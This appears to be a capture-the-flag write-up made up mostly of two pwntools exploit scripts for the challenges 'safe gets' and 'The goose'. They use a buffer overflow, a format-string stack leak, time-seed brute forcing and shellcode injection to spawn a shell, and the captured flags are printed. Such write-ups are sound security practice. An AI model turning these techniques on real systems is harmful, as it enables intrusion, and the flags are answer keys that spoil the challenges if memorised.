safe gets
Cool challenge
#!/usr/bin/env python3
from pwn import *
# Target binary and pwntools context (arch/bits/os are taken from the ELF).
elf = context.binary = ELF("./chall_patched")
context.terminal = ["tmux", "splitw", "-hl", "130"]
#context.log_level = "debug"
# gdb commands used when the script is started with GDB=1.
gs = "\nb main\ncontinue\n"
def start():
    """Return the tube to talk to.

    REMOTE=1 connects to the challenge host given in this script,
    GDB=1 launches the binary under gdb with the ``gs`` script,
    otherwise a plain local process is spawned.
    """
    if args.REMOTE:
        return remote("34.45.81.67", 16002)
    argv = [elf.path]
    if args.GDB:
        return gdb.debug(argv, gdbscript=gs)
    return process(argv)
r = start()  # module-level tube; the sa/sla/sl helpers below read this global at call time
def rcu(d1, d2=0):
    """Skip everything up to and including ``d1`` on the global tube ``r``.

    When a truthy ``d2`` is given, additionally read up to ``d2`` and
    return the bytes in between (delimiter dropped); otherwise return None.
    """
    r.recvuntil(d1, drop=True)
    if not d2:
        return None
    return r.recvuntil(d2, drop=True)
def libcbase():
    """Log ``libc.address`` in hex.

    NOTE(review): ``libc`` is not defined anywhere on this page, so calling
    this helper raises NameError; it is an unused template helper here.
    """
    return log.info("libc base = %#x" % libc.address)


def logleak(name, val):
    """Log ``val`` as a hex value labelled ``name``."""
    return log.info(name + " = %#x" % val)


def sa(delim, data):
    """``sendafter`` on the global tube ``r``."""
    return r.sendafter(delim, data)


def sla(delim, line):
    """``sendlineafter`` on the global tube ``r``."""
    return r.sendlineafter(delim, line)


def sl(line):
    """``sendline`` on the global tube ``r``."""
    return r.sendline(line)


def bc(value):
    """Return ``str(value)`` encoded as ASCII bytes."""
    return str(value).encode('ascii')


def demangle_base(value):
    """Shift ``value`` left by 12 bits (undo a ``>> 0xc``)."""
    return value << 0xc


def remangle(heap_base, value):
    """XOR ``value`` with ``heap_base >> 12`` (the glibc safe-linking formula)."""
    return (heap_base >> 0xc) ^ value
#========= exploit here ===================
def rstring(s: str) -> str:
    """Return ``s`` with its code points in reverse order."""
    return "".join(reversed(s))
jaja = "💀"
# Payload segments in construction order; the whole string is reversed by
# rstring() right before it is sent.
parts = [
    "A" * 0x28,
    # 8 little-endian bytes; latin1 maps each byte to exactly one code point
    p64(0x6a12400000000000).decode('latin1'),
    "C" * 0x10,
    "\x00" * 8,
    jaja * 0x40,
]
payload = "".join(parts)
# len() counts code points here, not encoded bytes (jaja is multi-byte in UTF-8).
print(len(payload))
log.info(f"payload len() = {len(payload)}")
sl(rstring(payload))
#L3AK{6375_15_4pp4r3n7ly_n3v3r_54f3}
#========= interactive ====================
r.interactive()
The goose
Very creative challenge :)
#!/usr/bin/env python3
from pwn import *
import time
import random
# Target binary and pwntools context (arch/bits/os are taken from the ELF).
elf = context.binary = ELF("./chall_patched", checksec=False)
context.terminal = ["tmux", "splitw", "-hp", "70"]
#context.log_level = "debug"
# gdb commands used when the script is started with GDB=1.
gs = "\ncontinue\n"
def start():
    """Return the tube to talk to.

    REMOTE=1 connects to the challenge host given in this script,
    GDB=1 launches the binary under gdb with the ``gs`` script,
    otherwise a plain local process is spawned.
    """
    if args.REMOTE:
        return remote("34.45.81.67", 16004)
    argv = [elf.path]
    if args.GDB:
        return gdb.debug(argv, gdbscript=gs)
    return process(argv)
#r = start()
def rcu(d1, d2=0):
    """Skip everything up to and including ``d1`` on the global tube ``r``.

    When a truthy ``d2`` is given, additionally read up to ``d2`` and
    return the bytes in between (delimiter dropped); otherwise return None.
    """
    r.recvuntil(d1, drop=True)
    if not d2:
        return None
    return r.recvuntil(d2, drop=True)
def libcbase():
    """Log ``libc.address`` in hex.

    NOTE(review): ``libc`` is not defined anywhere on this page, so calling
    this helper raises NameError; it is an unused template helper here.
    """
    return log.info("libc base = %#x" % libc.address)


def logleak(name, val):
    """Log ``val`` as a hex value labelled ``name``."""
    return log.info(name + " = %#x" % val)


def sa(delim, data):
    """``sendafter`` on the global tube ``r`` (rebound by the main loop)."""
    return r.sendafter(delim, data)


def sla(delim, line):
    """``sendlineafter`` on the global tube ``r`` (rebound by the main loop)."""
    return r.sendlineafter(delim, line)


def sl(line):
    """``sendline`` on the global tube ``r`` (rebound by the main loop)."""
    return r.sendline(line)


def bc(value):
    """Return ``str(value)`` encoded as ASCII bytes."""
    return str(value).encode('ascii')


def demangle_base(value):
    """Shift ``value`` left by 12 bits (undo a ``>> 0xc``)."""
    return value << 0xc


def remangle(heap_base, value):
    """XOR ``value`` with ``heap_base >> 12`` (the glibc safe-linking formula)."""
    return (heap_base >> 0xc) ^ value
#========= exploit here ===================
# Main loop: seed Python's PRNG with every epoch second in a +/-40 s window
# around "now" and collect the first randint(10, 100) each seed produces;
# each candidate is then tried against a fresh connection. The loop only
# terminates through exit(0) on success.
while True:
    ts = int(time.time())
    nhonks_list = []
    c = 0  # attempt counter; reset on every pass of the outer loop
    for delta in range(-40, 41):
        random.seed(ts + delta)
        nhonks = random.randint(10, 100)
        nhonks_list.append(nhonks)
    for nhonks in nhonks_list:
        r = start()  # reconnect every time (rebinds the global used by sla/sl/rcu)
        #r.timeout = 1
        # NOTE(review): these two sends are outside the try below, so an
        # EOFError raised here is not caught and ends the script.
        sla(b"> ",b"AAAAAAAA")
        sla(b"honks?", bc(nhonks))
        try:
            c += 1
            log.info(f"Try #{c}")
            res = r.recv(timeout=1)  # b"" on timeout, EOFError if the peer closed
            if b"wow" in res or b"what's your name again?" in res or b"leave to the world?" in res:
                log.success(f"Encontrado nhonks = {nhonks}")
                payload = b"%p-"*12
                payload += b"%p"
                sl(payload)
                # first "%p" value after "wow ", parsed as hex
                leak = int(rcu(b"wow ","-"),16)
                logleak(f"stack leak", leak)
                payload = b"A"*0x178
                payload += p64(leak+0x60) #to land in the stack
                payload += b"\x90"*0x20
                payload += asm(shellcraft.sh())
                sla(b"to the world?", payload)
                r.interactive()
                exit(0)
        except EOFError:
            r.close()
            continue
        except Exception:
            # NOTE(review): broad catch; the error is neither logged nor re-raised
            r.close()
            time.sleep(1)
#========= interactive ====================
# NOTE(review): unreachable -- the while True above never breaks, it exits via exit(0).
r.interactive()
#L3AK{H0nk_m3_t0_th3_3nd_0f_l0v3}